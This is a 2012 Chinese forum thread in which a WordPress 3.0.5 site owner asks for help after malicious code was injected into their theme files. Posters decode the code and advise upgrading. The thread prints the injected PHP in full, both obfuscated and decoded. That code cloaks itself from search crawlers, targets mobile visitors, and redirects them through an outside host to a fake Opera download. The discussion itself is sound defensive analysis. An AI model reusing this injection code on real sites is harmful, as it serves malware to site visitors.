wordpress主题被恶意篡改怎么办？版本3.0.5

This topic created in 4947 days ago, the information mentioned may be changed or developed.

已经第二次了，主题所有文件权限被修改成不可写，并且被添加如下代码：
<?php
$_ = strrev('tressa'); @$_("e\166\141\154\050b\141\163\145\066\064\137\144\145\143\157\144\145\050'aWYgKChwcmVnX21hdGNoKCcvdGV4dFwvdm5kLndhcC53bWx8YXBwbGljYXRpb25cL3ZuZC53YXAueGh0bWxcK3htbC9zaScsIEAkX1NFUlZFUlsnSFRUUF9BQ0NFUFQnXSkgfHwgcHJlZ19tYXRjaCgnL2FsY2F0ZWx8YW1vaXxhbmRyb2lkfGF2YW50Z298YmxhY2tiZXJyeXxiZW5xfGNlbGx8Y3JpY2tldHxkb2NvbW98ZWxhaW5lfGh0Y3xpZW1vYmlsZXxpcGhvbmV8aXBhZHxpcGFxfGlwb2R8ajJtZXxqYXZhfG9wZXJhLm1pbml8bWlkcHxtbXB8bW9iaXxtb3Rvcm9sYXxuZWMtfG5va2lhfHBhbG18cGFuYXNvbmljfHBoaWxpcHN8cGhvbmV8c2FnZW18c2hhcnB8c2llLXxzbWFydHBob25lfHNvbnl8c3ltYmlhbnx0LW1vYmlsZXx0ZWx1c3x1cFwuYnJvd3Nlcnx1cFwubGlua3x2b2RhZm9uZXx3YXB8d2Vib3N8d2lyZWxlc3N8eGRhfHhvb218enRlL3NpJywgQCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkgfHwgcHJlZ19tYXRjaCgnL21zZWFyY2h8bVw/cT0vc2knLCBAJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddKSkgJiYgIXByZWdfbWF0Y2goJy9tYWNpbnRvc2h8YW1lcmljYXxhdmFudHxkb3dubG9hZHx3aW5kb3dzXC1tZWRpYVwtcGxheWVyfHlhbmRleHxnb29nbGUvc2knLCBAJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSkgeyBlY2hvICc8c2NyaXB0IHNyYz0iaHR0cDovL21vYmlsZS1jb250ZW50LmluZm8vanF1ZXJ5LTEuNy4xLmpzIj48L3NjcmlwdD4nOyBmbHVzaCgpOyBleGl0OyB9'\051\051\073");
?>
与提供主机服务的国内某主机提供商技术交涉，对方认为不是服务器被入侵。是我程序的漏洞导致的。Wordpress有这种漏洞吗？

14 replies • 1970-01-01 08:00:00 +08:00

liliang13

Nov 21, 2012

为什么不升最新版呢

旧版是有漏洞的。

manhere

Nov 21, 2012

楼主位代码转换为：
<?php
if ((preg_match('/text\/vnd.wap.wml|application\/vnd.wap.xhtml\+xml/si', @$_SERVER['HTTP_ACCEPT']) || preg_match('/alcatel|amoi|android|avantgo|blackberry|benq|cell|cricket|docomo|elaine|htc|iemobile|iphone|ipad|ipaq|ipod|j2me|java|opera.mini|midp|mmp|mobi|motorola|nec-|nokia|palm|panasonic|philips|phone|sagem|sharp|sie-|smartphone|sony|symbian|t-mobile|telus|up\.browser|up\.link|vodafone|wap|webos|wireless|xda|xoom|zte/si', @$_SERVER['HTTP_USER_AGENT']) || preg_match('/msearch|m\?q=/si', @$_SERVER['HTTP_REFERER'])) && !preg_match('/macintosh|america|avant|download|windows\-media\-player|yandex|google/si', @$_SERVER['HTTP_USER_AGENT'])) { echo '<script src="http://mobile-content.info/jquery-1.7.1.js"></script>'; flush(); exit; }
?>
工具： http://ddecode.com/phpdecoder/?results=a83df371e20876a7bf0ea4622a63b559

没看出有什么恶意来，似乎是移动端判断？

Brutal

Nov 21, 2012

@manhere 移动端判断完后载入 http://mobile-content.info/jquery-1.7.1.js
这个文件里是
window.location = "http://operanew-in.mobi/?stream=2091&type=auto";

打开后是个俄文网站，然后提示下载 Opera.jar

orz

alexrezit

Nov 21, 2012

每次 WP 升级都有一大批不更新的 blog 沦陷... 而且据很多 php 程序员讲 WP 的代码其实很烂 (真的吗?).

webgeekman

Nov 21, 2012

诚心求教@manhere 转换方法！！！这是用的什么机制，见笑了从未听说过。
@manhere 说的没错。的确跳转并下载。不过在国内由于有GFW，效果不是很理想，但导致网站完全无法访问了。

Yooguo

Nov 21, 2012

为什么不升级？

webgeekman

Nov 21, 2012

@alexrezit 作为一个成熟的开发者，不要轻信道听途说。建议到官方下载源码自己体会一下吧。
个人感觉有好的地方，也有坏的地方，不能一概而论，并且wordpress好多思想还是非常棒的!只是执行效率真心不高。

webgeekman

Nov 21, 2012

@Yooguo
@liliang13

因为。。。。。。。懒！！！：（

Yooguo

Nov 21, 2012

后台直接升级很快的呀最好还是升级到最新版本吧

alexrezit

Nov 21, 2012

@webgeekman 我不是搞 php 的, 所以才会问嘛.

manhere

Nov 21, 2012

@webgeekman 转换方法上面写了呀：
在线工具 http://ddecode.com/phpdecoder/

Sivan

Nov 21, 2012

也可能是主题漏洞喔～升级 WP 后看看还有没有这个情况。

zhouzb889

Nov 22, 2012

这种问题要么主题，要么主机的问题，从这两方面入手。

webgeekman

Nov 22, 2012

@manhere 多谢咸蛋孟达兄！！！
@alexrezit wordpress整体来说还不错。做简单的东西可以考虑。
@Yooguo 必须升级了。